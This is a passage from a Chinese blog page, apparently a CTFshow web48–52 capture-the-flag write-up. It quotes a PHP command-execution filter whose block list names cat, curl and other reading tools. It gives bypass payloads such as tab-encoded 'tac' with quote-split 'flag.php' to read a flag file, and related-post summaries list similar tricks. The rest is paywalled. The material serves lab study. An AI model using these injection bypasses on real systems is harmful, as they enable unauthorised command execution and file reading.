CTFshow web48 49 50 51 52

最新推荐文章于 2025-06-09 19:11:35 发布
原创 最新推荐文章于 2025-06-09 19:11:35 发布 · 1.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #php

本文详细分析了一系列Web安全漏洞,包括过滤绕过方法,如使用%09、%0a、<等特殊字符来规避限制。通过payload演示,展示了如何在不同过滤条件下获取flag。同时,探讨了在遇到问题时如何借助其他命令或工具进行尝试,例如ls、nl等,以找到隐藏的flag。

目录

web48

代码分析:

payload:

flag:

web49

代码分析:

payload:

flag:

web50

payload:

flag:

web51 

代码分析:

payload:

 flag:

web52

代码分析:

payload:

flag:

web48

代码分析:

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }

emm,这里过滤了很多用不上的东西,直接%09绕过空格,引号绕过flag%0a绕过后面的重定向就可以

知识点:%09和%0a不算数字所以过滤[0-9]没有影响的

payload:

?c=tac%09fl""ag.php||

?c=tac%09fl""ag.php%0a

flag:

ctfshow{d4152ec2-7b1b-48f4-9822-706bea5ddef6} 

web49

代码分析:

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|c
最低0.47元/天 解锁文章
CTFshow 命令执行 web47
Kradress的博客
11-20 258
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:59:23 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
ctfshow-web47,48(命令执行)
m0_62094846的博客
01-26 193
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:59:23 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c']; .
[ctfshow web入门] web48 回显黑洞,无效无效
qq_50332504的博客
05-06 247
这是一道关于CTFshow Web入门题(web46)的解题分析。题目过滤了多个命令和符号,如分号、cat、flag、空格、数字等。解题方案是通过特殊符号绕过过滤,如使用%09(制表符)、%0a(换行符)以及通配符?。可用tac%09fl?g.php%0a等payload读取flag。文章还提供了相关题目链接。
CTFshow 命令执行 web50
Kradress的博客
11-20 551
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:32:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
ctfshow-web52(命令执行)
m0_62094846的博客
01-28 696
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:50:30 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c']; .
ctfshow web入门命令执行web49-web53
m0_62207170的博客
03-31 406
ctfshow web入门命令执行web49-web53
ctfshow web入门 命令运行 web39---web52
2301_81040377的博客
04-02 1098
昨天看了一下我的博客真的很恼火,不好看,还是用md来写吧。
CTFshow 命令执行 web51
Kradress的博客
11-20 429
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:42:52 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
CTFshow web入门 web29-------web56 命令执行wp
2202_75289892的博客
07-30 1048
过滤了flag,可见是文件名过滤,需要查看flag.php 或者flag.txt等文件。此外 读取文件利用cat函数,输出利用system、passthru。3.双引号绕过 fl''ag''.php。2.反斜杠绕过 fl\ag.php。1.通配符绕过 fla?还有特殊变量$1、内联执行等。
CTFshow 命令执行 web52
Kradress的博客
11-20 1216
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:50:30 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
CTFshow-Web入门》05. Web 41~50
学习学习学习......
04-10 2782
eval() 利用与正则绕过,或运算【|】构造可用字符、system() 利用与正则绕过,{>/dev/null 2>&1} 绕过。
[ctfshow web入门] web50 黑洞回显,\t过滤,&过滤
qq_50332504的博客
05-06 226
文章摘要: 这是一道CTF题目解析,考察绕过PHP过滤执行系统命令。题目过滤了分号、cat、flag、空格、数字等字符,以及制表符和&符号。解题思路是利用未被过滤的tac命令和重定向符(<或<>)绕过限制,同时通过字符拼接(fla\g.php或fla''g.php)突破关键词过滤。需要注意重定向符不能与问号搭配使用。文章提供了两种可行解法,并链接了相关题目的详细解析和系列目录。
ctfshow-web50,51(命令执行)
m0_62094846的博客
01-28 735
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:32:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c'];..
ctfshow web41-web50
m0_73721944的博客
04-24 1398
web41代码审计过滤了:[0-9] [a-z] ^ + ~ $ [ ] { } & -这次字母过滤了,字符不是很多思路:通过特殊字符来构造字母从而实现代码执行这里根据题目提示已经给了一篇博客第一个脚本运行结果是解释一下是怎么得来的:A %40 %01十六进制的40=十进制的64=二进制0100 0000十六进制的01=十进制的01=二进制0000 0001二者进行或运算0100 00000000 00010100 0001不理解的话可以具体去看一下这个网址带着的表运行结果。
Ctfshow web入门-命令执行web47-50 WP
qq_45427131的博客
05-20 521
查看源码发现又是熟悉的黑洞,这题过滤了的参数都可以用以下几个代替 tac 代替 cat < 代替 空格 ‘’分隔 代替 * 能代替的新命令 被过滤的命令 tac cat < 空格 “” * 注意:<不能和?连在一起用 构造payload: ?c=tac<fla''g.php%26%26ls web48 按照上一题的逻辑,查看有没有我们需要用到的参数被过滤了… 仔细分析下来之后发现没有参数被过滤,这个时候就可以复制上一题的payload到本题执行.
CTFshow web(php命令执行 50-54)
csjjjd的博客
02-12 1681
这里 system($c." >/dev/null 2>&1");其实就是将内容写入黑洞的意思,你的命令执行内容被带走了,所以这里使用命令分割 || (只执行h前面的命令)额,汗流浃背了,这过滤有点东西啊,之前的方法用不了了,这下只能文件写入了。这里没有写入黑洞里了,直接把上面payload复制然后删去||就好。过滤了cat使用tac ,空格过滤了使用<>这里没有禁用$那就使用${IFS}替换空格。}看准过滤条件,过滤了啥那就替换就好啊。这里把tac过滤了,直接换成nl就好了。
ctfshow web入门 命令执行:52-54
rawrecruit的博客
04-03 2334
ctfshow web入门 命令执行篇的个人刷题记录。
CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)
你们de4月天的博客
07-08 2413
ctfshow-pwn入门-栈溢出pwn49-mprotect函数静态链接pwn的应用
CTFshow-PWN-栈溢出(pwn49)两种方法+动调分析
最新发布
Welcome To Myon'Blog !
06-09 1528
执行后,可以看到 0x80da000 往后部分为可读可写可执行权限。看似开了 canary 保护,实际没有,是 checksec 版本太老了,检测到 __stack_chk_fail 函数就算开了。看似和上一题一模一样,但是细心的小朋友应该注意到了,左边多出了很多函数,说明这个程序是静态链接的,静态链接就意味着没法去打 ret2libc了,还是无 system 无 /bin/sh,考虑打 ret2syscall。
ctfshow web489
08-26
- *1* *2* *3* [CTFshow web48 49 50 51 52](https://blog.csdn.net/qq_40345591/article/details/127784493)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值